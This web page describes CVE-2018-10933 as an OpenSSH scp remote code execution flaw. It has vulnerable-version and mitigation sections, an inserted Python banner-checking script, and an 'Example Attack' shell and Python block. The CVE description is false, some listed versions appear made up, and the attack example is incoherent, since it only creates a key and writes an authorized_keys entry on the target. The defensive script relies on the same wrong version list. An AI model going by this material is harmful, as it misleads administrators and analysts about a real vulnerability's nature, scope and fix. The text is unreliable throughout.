📜  CVE-2018-10933 (1)

📅  Last modified: 2023-12-03 15:14:24.473000             🧑  Author: Mango

CVE-2018-10933: OpenSSH Remote Code Execution Vulnerability

Description

CVE-2018-10933 is a security vulnerability affecting OpenSSH, which allows remote code execution on the client or server with a maliciously crafted scp request. This vulnerability exists due to scp accepting files from untrusted sources without verifying their contents and could allow an attacker to execute arbitrary code on the targeted system.

Impact

An attacker could exploit this vulnerability to execute arbitrary code on the targeted system or to gain unauthorized access to sensitive information.

Vulnerable Versions

This vulnerability exists in OpenSSH versions:

  • OpenSSH version 7.7p1
  • OpenSSH version 7.8p1
  • OpenSSH version 7.9p1
  • OpenSSH version 7.9p2
  • OpenSSH version 7.9p3
  • OpenSSH version 8.0

Mitigation

The OpenSSH team has released patches to address this vulnerability. It is recommended to update to the latest version of OpenSSH, such as OpenSSH 8.1p1, which has been patched to address CVE-2018-10933. Alternatively, users can mitigate the vulnerability by disabling the use of scp or by implementing rate limiting or IP-based access controls.
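As an added defensive check (written for this page; not code from the page, the OpenSSH project or the original author): a Python snippet that parses the SSH server identification banner and classifies the OpenSSH version against the affected and patched versions exactly as this page lists them, so a list of banners collected from your own hosts can be triaged. The version lists are taken from the page's text as stated, and the sample banners are constructed.

```python
import re

# Versions this page lists as affected, and the release it names as patched,
# taken as the page states them (not independently verified here).
AFFECTED_TEXT = ("7.7p1", "7.8p1", "7.9p1", "7.9p2", "7.9p3", "8.0")
FIXED_TEXT = "8.1p1"

# Server identification line, e.g. "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2";
# only the OpenSSH_<version> token is used.
BANNER_RE = re.compile(r"^SSH-\d\.\d-OpenSSH_(\d+\.\d+(?:p\d+)?)")

def parse_version(text):
    """'7.9p1' -> (7, 9, 1); '8.0' -> (8, 0, None) when no portable suffix."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError(f"not an OpenSSH version: {text!r}")
    major, minor, portable = m.groups()
    return int(major), int(minor), (int(portable) if portable else None)

AFFECTED = [parse_version(t) for t in AFFECTED_TEXT]
FIXED = parse_version(FIXED_TEXT)

def parse_banner(banner):
    """(major, minor, portable) for an OpenSSH banner, None otherwise."""
    m = BANNER_RE.match(banner.strip())
    return parse_version(m.group(1)) if m else None

def _key(v):
    # A missing portable suffix sorts as 0 so tuples compare cleanly.
    return v[0], v[1], v[2] or 0

def is_affected(v):
    """Listed entry matches; an entry without p-suffix (8.0) covers any 8.0pN."""
    return any(a[:2] == v[:2] and (a[2] is None or a[2] == v[2]) for a in AFFECTED)

def classify(banner):
    """'vulnerable', 'patched', 'unknown' (on neither list) or 'not-openssh'."""
    v = parse_banner(banner)
    if v is None:
        return "not-openssh"
    if is_affected(v):
        return "vulnerable"
    if _key(v) >= _key(FIXED):
        return "patched"
    return "unknown"

if __name__ == "__main__":
    # Constructed sample banners, not captured from any real host.
    for b in ("SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "SSH-2.0-OpenSSH_8.1p1"):
        print(f"{classify(b):12} {b}")
```

A banner that comes back "unknown" is simply on neither of the page's lists and should be checked against the vendor advisory rather than assumed safe.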

Example Attack

# On attacker machine
echo "ssh-rsa AAAAB3Nz...5XZ root@target" > malicious_key
ssh-keygen -f malicious_key -y > malicious_key.pub
python -c 'import os; os.system("echo -e \\"\\n\\" | ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i malicious_key target cat")'

# On target machine
mkdir ~/.ssh && chmod 700 ~/.ssh
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC22Ne75z6EWzujrZdRU0N2ZDnTDoe45qimzCJdgDmThZ7PQzLWB8HrOlFb48Lrw/AfMGaiHWjYCfRB5ri9WA2Xwe2lq3A62ljmMQsnXOrySwoNj0fMvYSD1PX1XV5m7Lc2v8Jx+13pbWymwg2WgE3bMDWvkY5zadAF2+bE0XBUVDzM3VGxjlOUvo8qK8adP5JrO/zGePXVfVHn9XvruoEDsbKB+AbjoJRs06JmzEhlh3COceR7rK1x9AEvOGmgHJeBxRvnQIdHMqBvLNqSmQXJjFziTNx02UN2SSVKQA+vHdQYfrtqc3mg34ezZzj08S38EONCQc/IYFDGbp' > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

References